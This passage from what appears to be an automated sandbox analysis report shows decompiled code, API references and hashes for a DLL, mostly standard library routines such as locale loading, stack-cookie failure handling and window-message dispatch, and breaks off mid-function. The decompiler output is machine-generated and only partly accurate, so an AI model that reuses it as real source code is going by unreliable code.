					if( *_t18 == 0) {
						 *(E10020B71(__eflags)) = _t34;
					} else {
						E10005177( *((intOrPtr*)(E10020B71(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E1001FBB5(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x10005ce3
0x10005ce3
0x10005ce3
0x10005ce3
0x10005cec
0x10005cf3
0x10005cf6
0x10005cfe
0x10005d06
0x10005d7a
0x10005d7c
0x00000000
0x00000000
0x10005d7e
0x10005d08
0x10005d15
0x10005d16
0x10005d1b
0x10005d1e
0x10005d1e
0x10005d1f
0x10005d25
0x10005d2c
0x10005d3c
0x10005d51
0x10005d53
0x10005d58
0x10005d5b
0x10005d85
0x10005d5d
0x10005d64
0x10005d69
0x10005d8a
0x10005d9f
0x10005d9f
0x10005d90
0x10005d97
0x10005d97
0x10005da1
0x10005da2
0x10005da2
0x10005daf

APIs

_strcpy_s.LIBCMT ref: 10005D10

Part of subcall function 10001000: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10001000: __EH_prolog3.LIBCMT ref: 10004E8F

Part of subcall function 10020B71: __getptd_noexit.LIBCMT ref: 10020B71

__snprintf_s.LIBCMT ref: 10005D49

Part of subcall function 10020F1E: __vsnprintf_s_l.LIBCMT ref: 10020F33

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10005D74
LoadLibraryA.KERNEL32(?), ref: 10005D97

Strings

LOC, xrefs: 10005D08

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Exception@8H_prolog3InfoLibraryLoadLocaleThrow__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
String ID: LOC
API String ID: 4018564869-519433814
Opcode ID: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction ID: a9d45852776f355f9b5d50c5a058e6740ec097f8b3d9f9fbd80e36b8e0c44140
Opcode Fuzzy Hash: 4f0d158bbcc9af0cb7d9660866c3b5ed689d3bebe7d48719b60939431f1f056f
Instruction Fuzzy Hash: F9113A35900208AFE732D764DC4BBDF76ACDF04396F5104A3F6059B0A6DB716D448661

Uniqueness

Uniqueness Score: -1.00%

Function 1001FBB5 Relevance: 7.6, APIs: 5, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1001FBB5(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10045580; // 0xe155dca3
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10048ee8 = _t6;
				 *0x10048ee4 = _t22;
				 *0x10048ee0 = _t25;
				 *0x10048edc = _t21;
				 *0x10048ed8 = _t27;
				 *0x10048ed4 = _t26;
				 *0x10048f00 = ss;
				 *0x10048ef4 = cs;
				 *0x10048ed0 = ds;
				 *0x10048ecc = es;
				 *0x10048ec8 = fs;
				 *0x10048ec4 = gs;
				asm("pushfd");
				_pop( *0x10048ef8);
				 *0x10048eec =  *_t31;
				 *0x10048ef0 = _v0;
				 *0x10048efc =  &_a4;
				 *0x10048e38 = 0x10001;
				_t11 =  *0x10048ef0; // 0x0
				 *0x10048dec = _t11;
				 *0x10048de0 = 0xc0000409;
				 *0x10048de4 = 1;
				_t12 =  *0x10045580; // 0xe155dca3
				_v812 = _t12;
				_t13 =  *0x10045584; // 0x1eaa235c
				_v808 = _t13;
				 *0x10048e30 = IsDebuggerPresent();
				_push(1);
				E1002CAF6(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10039e30);
				if( *0x10048e30 == 0) {
					_push(1);
					E1002CAF6(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x1001fbb5
0x1001fbb5
0x1001fbb5
0x1001fbb5
0x1001fbb5
0x1001fbb5
0x1001fbb5
0x1001fbbb
0x1001fbbd
0x1001fbbd
0x10026285
0x1002628a
0x10026290
0x10026296
0x1002629c
0x100262a2
0x100262a8
0x100262af
0x100262b6
0x100262bd
0x100262c4
0x100262cb
0x100262d2
0x100262d3
0x100262dc
0x100262e4
0x100262ec
0x100262f7
0x10026301
0x10026306
0x1002630b
0x10026315
0x1002631f
0x10026324
0x1002632a
0x1002632f
0x1002633b
0x10026340
0x10026342
0x1002634a
0x10026355
0x10026362
0x10026364
0x10026366
0x1002636b
0x1002637f

APIs

IsDebuggerPresent.KERNEL32 ref: 10026335
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002634A
UnhandledExceptionFilter.KERNEL32(10039E30), ref: 10026355
GetCurrentProcess.KERNEL32(C0000409), ref: 10026371
TerminateProcess.KERNEL32(00000000), ref: 10026378

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction ID: 5ceda17ef6beca13f91ed3eb6d695352f2d28ceca655d5ac6984320e078a27cc
Opcode Fuzzy Hash: 01d0eb0c0dcaba5af3b0515de7aff01423ec1db4b762333c52675aa0d91e68a1
Instruction Fuzzy Hash: FF21F274810225DFF741EF2ADEC46593BB4FB0A305F40481AEA08CB662E7B15A85CF0D

Uniqueness

Uniqueness Score: -1.00%

Function 1000ACED Relevance: 6.0, APIs: 4, Instructions: 41
keyboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000ACED(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1000EEC4(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E1000A84C(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10005CAE();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}

0x1000acf0
0x1000acfc
0x1000ad44
0x1000ad46
0x1000ad4d
0x00000000
0x1000ad4f
0x1000ad03
0x1000ad07
0x00000000
0x00000000
0x1000ad09
0x1000ad16
0x00000000
0x1000ad2a
0x1000ad39
0x00000000
0x1000ad41

APIs

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

GetKeyState.USER32 ref: 1000AD11
GetKeyState.USER32 ref: 1000AD1A
GetKeyState.USER32 ref: 1000AD23
SendMessageA.USER32 ref: 1000AD39

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction ID: eef2aa2a50f2ce3d6a27787399a9e196b8ce042d27520782e3c7ec791ce6f79c
Opcode Fuzzy Hash: a3e213466f0cc79bb1ea557e72bfa32ef1c8a60120fac16cfa118bb559ebee9b
Instruction Fuzzy Hash: F9F089B678039B1BF550B2748C41F952154CF4ABD6F010731B643EE4DACD65D8C15670

Uniqueness

Uniqueness Score: -1.00%

Function 10032820 Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10032820() {
				signed int _v8;
				char _v16;
				void* __esi;
				signed int _t8;
				intOrPtr* _t15;
				intOrPtr _t16;
				char _t20;
				intOrPtr _t22;
				intOrPtr _t23;
				signed int _t24;
				int _t25;
				signed int _t27;

				_t8 =  *0x10045580; // 0xe155dca3
				_v8 = _t8 ^ _t27;
				_t24 = 0;
				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
					L4:
					_t25 = GetACP();
				} else {
					_t20 = _v16;
					_t15 =  &_v16;
					if(_t20 == 0) {
						goto L4;
					} else {
						do {
							_t15 = _t15 + 1;
							_t24 = _t24 * 0xa + _t20 - 0x30;
							_t20 =  *_t15;
						} while (_t20 != 0);
						if(_t24 == 0) {
							goto L4;
						}
					}
				}
				return E1001FBB5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
			}

0x10032826
0x1003282d
0x10032831
0x1003284d
0x1003286e
0x10032874
0x1003284f
0x1003284f
0x10032854
0x10032857
0x00000000
0x10032859
0x10032859
0x1003285f
0x10032860
0x10032864
0x10032866
0x1003286c
0x00000000
0x00000000
0x1003286c
0x10032857
0x10032884

APIs

GetThreadLocale.KERNEL32 ref: 10032833
GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10032845
GetACP.KERNEL32 ref: 1003286E

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Locale$InfoThread
String ID:
API String ID: 4232894706-0
Opcode ID: 8f0d28d75013055cb10158a0612970c0a9893228da2cd390bf36d54f26c36d1f
Instruction ID: c2008de266833c78ffcbd1f7b5091dc3b532eb19603803d402c2ea9d6af6b284
Opcode Fuzzy Hash: 8f0d28d75013055cb10158a0612970c0a9893228da2cd390bf36d54f26c36d1f
Instruction Fuzzy Hash: 39F0C231E012385FD712DB74CC65AAF77E4EF0AA82F11819DE981EB241DB20AD08C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 100084E6 Relevance: 4.5, APIs: 3, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E100084E6(struct HWND__* _a4, signed int _a8) {
				struct _WINDOWPLACEMENT _v48;
				int _t16;

				if(E100083A5() == 0) {
					if((_a8 & 0x00000003) == 0) {
						if(IsIconic(_a4) == 0) {
							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
						} else {
							_t16 = GetWindowPlacement(_a4,  &_v48);
						}
						if(_t16 == 0) {
							return 0;
						} else {
							return E1000849A( &(_v48.rcNormalPosition), _a8);
						}
					}
					return 0x12340042;
				}
				return  *0x100482e4(_a4, _a8);
			}

0x100084f3
0x10008507
0x1000851b
0x10008533
0x1000851d
0x10008524
0x10008524
0x1000853b
0x00000000
0x1000853d
0x00000000
0x10008544
0x1000853b
0x00000000
0x10008509
0x00000000

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5040ab40e70315c2dbca04872de902a9a09ba11d6d5686e44c4fd55fea06db2
Instruction ID: e4924bfc53d2e17fd8ec0938dc174512458617aa0288f31416b22d4e1293315d
Opcode Fuzzy Hash: f5040ab40e70315c2dbca04872de902a9a09ba11d6d5686e44c4fd55fea06db2
Instruction Fuzzy Hash: 80F03731500909EAFF02DFA0CC48AAE3BB8FF042CAB40C020FC95D9069DB71DB949B61

Uniqueness

Uniqueness Score: -1.00%

Function 10027FFA Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10027FFA(void* __eax, void* __ebx, void* __edx) {
				_Unknown_base(*)()* _t8;

				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
				_t8 = SetUnhandledExceptionFilter(E10025C66());
				 *0x10049228 = 0;
				return _t8;
			}

0x10027fff
0x1002800f
0x10028015
0x1002801c

APIs

__decode_pointer.LIBCMT ref: 10028008

Part of subcall function 10025C66: TlsGetValue.KERNEL32(?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001,?,?,10041328), ref: 10025C73
Part of subcall function 10025C66: TlsGetValue.KERNEL32(00000008,?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001), ref: 10025C8A
Part of subcall function 10025C66: RtlDecodePointer.NTDLL(00000001,?,10025FF4,00000000,00000000,100208C6,00000000,?,?,00000001,?,?,1002092A,00000001), ref: 10025CBD

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1002800F

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Value$DecodeExceptionFilterPointerUnhandled__decode_pointer
String ID:
API String ID: 3433037573-0
Opcode ID: 3c9a6ff3b7cdb25ad6f78b02430afb574306ad8683ed00fcf6e17502d826d45d
Instruction ID: 3b32e5b9c4e5c339fa1c0dbd4148b0cbcea0ee2ce0a13854ea5d902e377eb68c
Opcode Fuzzy Hash: 3c9a6ff3b7cdb25ad6f78b02430afb574306ad8683ed00fcf6e17502d826d45d
Instruction Fuzzy Hash: ADC08C848083C02FEB01D3346ECC34C3A04E716001FF804F9D080C4153D8E880808129

Uniqueness

Uniqueness Score: -1.00%

Function 1000C578 Relevance: 1.9, APIs: 1, Instructions: 445
COMMONCrypto

Download Yara Rule

C-Code - Quality: 37%

			E1000C578(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				unsigned int _t147;
				signed int _t149;
				signed int* _t152;
				intOrPtr _t159;
				intOrPtr* _t160;
				unsigned int _t163;
				unsigned int _t166;
				signed int* _t170;
				signed int* _t173;
				unsigned int _t177;
				unsigned int _t181;
				unsigned int _t185;
				signed int _t189;
				signed int* _t194;
				signed int _t195;
				unsigned int _t196;
				intOrPtr* _t197;
				unsigned int _t198;
				signed int _t213;
				signed int _t217;
				unsigned int _t224;
				void* _t225;

				_t200 = __ecx;
				_push(0x70);
				E1001FBC4(E100336CE, __ebx, __edi, __esi);
				_t222 = __ecx;
				 *((intOrPtr*)(_t225 - 0x10)) = 0;
				 *((intOrPtr*)(_t225 - 0x14)) = 0x7fffffff;
				_t189 =  *(_t225 + 8);
				 *(_t225 - 4) = 0;
				if(_t189 != 0x111) {
					__eflags = _t189 - 0x4e;
					if(_t189 != 0x4e) {
						__eflags = _t189 - 6;
						_t224 =  *(_t225 + 0x10);
						if(_t189 == 6) {
							E1000BF47(_t200, _t222,  *((intOrPtr*)(_t225 + 0xc)), E1000A8F0(_t189, __ecx, _t225, _t224));
						}
						__eflags = _t189 - 0x20;
						if(_t189 != 0x20) {
							L12:
							_t147 =  *(_t222 + 0x4c);
							__eflags = _t147;
							if(_t147 == 0) {
								L20:
								_t149 =  *((intOrPtr*)( *_t222 + 0x28))();
								 *(_t225 + 0x10) = _t149;
								E100095AE(_t225 - 0x14, _t222, 7);
								_t194 = 0x10046ae0 + ((_t149 ^  *(_t225 + 8)) & 0x000001ff) * 0xc;
								__eflags =  *(_t225 + 8) -  *_t194;
								 *(_t225 - 0x18) = _t194;
								if( *(_t225 + 8) !=  *_t194) {
									L25:
									_t152 =  *(_t225 - 0x18);
									_t195 =  *(_t225 + 0x10);
									 *_t152 =  *(_t225 + 8);
									_t152[2] = _t195;
									while(1) {
										__eflags =  *_t195;
										if( *_t195 == 0) {
											break;
										}
										__eflags =  *(_t225 + 8) - 0xc000;
										_push(0);
										_push(0);
										if( *(_t225 + 8) >= 0xc000) {
											_push(0xc000);
											_push( *((intOrPtr*)( *(_t225 + 0x10) + 4)));
											while(1) {
												_t196 = E10008DCB();
												__eflags = _t196;
												if(_t196 == 0) {
													break;
												}
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) -  *(_t225 + 8);
												if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)))) ==  *(_t225 + 8)) {
													( *(_t225 - 0x18))[1] = _t196;
													E100095DD(_t225 - 0x14);
													L102:
													_t197 =  *((intOrPtr*)(_t196 + 0x14));
													L103:
													_push(_t224);
													_push( *((intOrPtr*)(_t225 + 0xc)));
													L104:
													_t159 =  *_t197();
													L105:
													 *((intOrPtr*)(_t225 - 0x10)) = _t159;
													goto L106;
												}
												_push(0);
												_push(0);
												_push(0xc000);
												_t198 = _t196 + 0x18;
												__eflags = _t198;
												_push(_t198);
											}
											_t195 =  *(_t225 + 0x10);
											L36:
											_t195 =  *_t195();
											 *(_t225 + 0x10) = _t195;
											continue;
										}
										_push( *(_t225 + 8));
										_push( *((intOrPtr*)(_t195 + 4)));
										_t166 = E10008DCB();
										__eflags = _t166;
										 *(_t225 + 0x10) = _t166;
										if(_t166 == 0) {
											goto L36;
										}
										( *(_t225 - 0x18))[1] = _t166;
										E100095DD(_t225 - 0x14);
										L29:
										_t213 =  *((intOrPtr*)( *(_t225 + 0x10) + 0x10)) - 1;
										__eflags = _t213 - 0x44;
										if(__eflags > 0) {
											goto L106;
										}
										switch( *((intOrPtr*)(_t213 * 4 +  &M1000CA90))) {
											case 0:
												_push( *(__ebp + 0xc));
												_push(E1000FFD3(__ebx, __ecx, __edi, __esi, __eflags));
												goto L44;
											case 1:
												_push( *(__ebp + 0xc));
												goto L44;
											case 2:
												__eax = __esi;
												__eax = __esi >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = __si & 0x0000ffff;
												_push(__si & 0x0000ffff);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L49;
											case 3:
												_push(__esi);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L42;
											case 4:
												_push(__esi);
												L44:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 5:
												__ecx = __ebp - 0x28;
												E1000FAE1(__ebp - 0x28) =  *(__esi + 4);
												__ecx = __ebp - 0x7c;
												 *((char*)(__ebp - 4)) = 1;
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = E100095F7(__ecx, __eflags);
												__eax =  *__esi;
												__esi =  *(__esi + 8);
												 *((char*)(__ebp - 4)) = 2;
												 *(__ebp - 0x5c) = __eax;
												__eax = E1000A917(__ecx, __edi, __esi, __eflags, __eax);
												__eflags = __eax;
												if(__eflags == 0) {
													__eax =  *(__edi + 0x4c);
													__eflags = __eax;
													if(__eflags != 0) {
														__ecx = __eax + 0x24;
														__eax = E1001251C(__eax + 0x24, __edi, __esi,  *(__ebp - 0x5c));
														__eflags = __eax;
														if(__eflags != 0) {
															 *(__ebp - 0x2c) = __eax;
														}
													}
													__eax = __ebp - 0x7c;
												}
												_push(__esi);
												_push(__eax);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												__eax =  *__ebx();
												 *(__ebp - 0x24) =  *(__ebp - 0x24) & 0x00000000;
												 *(__ebp - 0x5c) =  *(__ebp - 0x5c) & 0x00000000;
												__ecx = __ebp - 0x7c;
												 *(__ebp - 0x10) = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 1;
												__eax = E1000B079(__ebx, __ebp - 0x7c, __edi, __esi, __eflags);
												goto L59;
											case 6:
												__ecx = __ebp - 0x28;
												E1000FAE1(__ebp - 0x28) =  *(__esi + 4);
												_push( *(__esi + 8));
												 *(__ebp - 0x24) =  *(__esi + 4);
												__eax = __ebp - 0x28;
												_push(__ebp - 0x28);
												__ecx = __edi;
												 *((char*)(__ebp - 4)) = 3;
												__eax =  *__ebx();
												_t95 = __ebp - 0x24;
												 *_t95 =  *(__ebp - 0x24) & 0x00000000;
												__eflags =  *_t95;
												 *(__ebp - 0x10) = __ebp - 0x28;
												L59:
												__ecx = __ebp - 0x28;
												 *((char*)(__ebp - 4)) = 0;
												__eax = E10010045(__ecx);
												goto L106;
											case 7:
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax;
												_push(__eax);
												__eax = E1000A8F0(__ebx, __ecx, __ebp, __esi);
												goto L61;
											case 8:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L42;
											case 9:
												goto L103;
											case 0xa:
												_push(__esi);
												_push(E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags));
												__eax =  *(__ebp + 0xc);
												__eax =  *(__ebp + 0xc) >> 0x10;
												L61:
												_push(__eax);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												L49:
												_push(__eax);
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0xb:
												_push(__esi);
												goto L87;
											case 0xc:
												_push( *(__ebp + 0xc));
												goto L90;
											case 0xd:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L106;
											case 0xe:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax =  *(__ebp + 0xc) & 0x0000ffff;
												goto L81;
											case 0xf:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												goto L81;
											case 0x10:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L95;
											case 0x11:
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												L87:
												_push( *(__ebp + 0xc));
												goto L88;
											case 0x12:
												__ecx = __edi;
												__eax =  *__ebx();
												goto L105;
											case 0x13:
												_push(E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc)));
												_push(E1000A8F0(__ebx, __ecx, __ebp, __esi));
												__eax = 0;
												__eflags =  *((intOrPtr*)(__edi + 0x20)) - __esi;
												__eax = 0 |  *((intOrPtr*)(__edi + 0x20)) == __esi;
												goto L93;
											case 0x14:
												_push( *(__ebp + 0xc));
												__eax = E1000FFD3(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x15:
												_push( *(__ebp + 0xc));
												__eax = E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags);
												goto L76;
											case 0x16:
												__esi = __esi >> 0x10;
												__eax = __ax;
												_push(__ax);
												__eax = __si;
												_push(__si);
												_push( *(__ebp + 0xc));
												__eax = E1000ED5E(__ebx, __ecx, __edi, __esi, __eflags);
												goto L93;
											case 0x17:
												_push( *(__ebp + 0xc));
												goto L75;
											case 0x18:
												_push(__esi);
												L75:
												__eax = E1000A8F0(__ebx, __ecx, __ebp);
												L76:
												_push(__eax);
												goto L90;
											case 0x19:
												_push(__esi >> 0x10);
												__eax = __si & 0x0000ffff;
												goto L79;
											case 0x1a:
												__eax = __si;
												__eflags = __esi;
												__ecx = __si;
												_push(__ecx);
												L79:
												_push(__eax);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												goto L93;
											case 0x1b:
												_push(__esi);
												__eax = E1000A8F0(__ebx, __ecx, __ebp,  *(__ebp + 0xc));
												L81:
												_push(__eax);
												goto L88;
											case 0x1c:
												 *(__ebp + 0xc) =  *(__ebp + 0xc) >> 0x10;
												_push( *(__ebp + 0xc) >> 0x10);
												__eax = E1000A8F0(__ebx, __ecx, __ebp, __esi);
												goto L92;
											case 0x1d:
												__ecx =  *(__ebp + 0xc);
												__edx = __cx;
												__ecx =  *(__ebp + 0xc) >> 0x10;
												__eflags = __eax - 0x2a;
												__ecx = __cx;
